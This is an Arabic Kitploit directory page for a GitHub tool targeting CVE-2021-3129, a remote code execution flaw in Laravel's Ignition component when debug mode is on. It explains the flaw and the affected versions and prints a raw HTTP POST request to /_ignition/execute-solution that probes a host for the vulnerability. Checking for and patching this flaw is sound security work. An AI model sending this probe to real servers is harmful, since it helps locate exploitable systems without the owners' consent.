Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2021-3129 — Laravel RCE CVE-2021-3129 | Kitploit
أدوات/GitHubGitHub/keyuan15/cve-2021-3129
تحليل الثغرات الأمنيةتحليل الكودالاستغلالاستغلال تطبيقات الويباختبار الاختراقالفريق الأحمر
GitHubkeyuan15/cve-2021-3129

CVE-2021-3129

Laravel RCE CVE-2021-3129

عرض المستودع
11منذ 3 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2021-3129

Laravel RCE CVE-2021-3129

نظرة عامة على الثغرة

عندما يتم تمكين وضع التصحيح (Debug) في Laravel، نظرًا للاستخدام غير الآمن للدوال file_get_contents() و file_put_contents() من قبل مكون Ignition المدمج في Laravel، يمكن للمهاجم إرسال طلبات ضارة، وإنشاء ملفات Log خبيثة بطرق تؤدي إلى تشغيل إلغاء التسلسل لـ Phar، مما يؤدي في النهاية إلى تنفيذ تعليمات برمجية عن بعد.

الإصدارات المتأثرة

Laravel <= 8.4.2

التحقق من الثغرة

  • إرجاع 500 يثبت وجود الثغرة
root@kitploit:~
POST /_ignition/execute-solution HTTP/1.1
Host: 192.168.24.153:8888
Accept: application/json
Content-Type: application/x-www-form-urlencoded
Content-Length: 133

solution=Facade\Ignition\Solutions\MakeViewVariableOptionalSolution&parameters[variableName]=cve20213129&parameters[viewFile]=null

سيناريو الاستغلال

image

المراجع

[CVE-2021-3129]Laravel Debug mode RCE إعادة إنتاج | tyskillのBlog

تنزيل الأداة
SNCKER/CVE-2021-3129: Laravel debug rce (github.com)

zhzyker/CVE-2021-3129: Laravel <= v8.4.2 debug mode: Remote code execution (CVE-2021-3129) (github.com)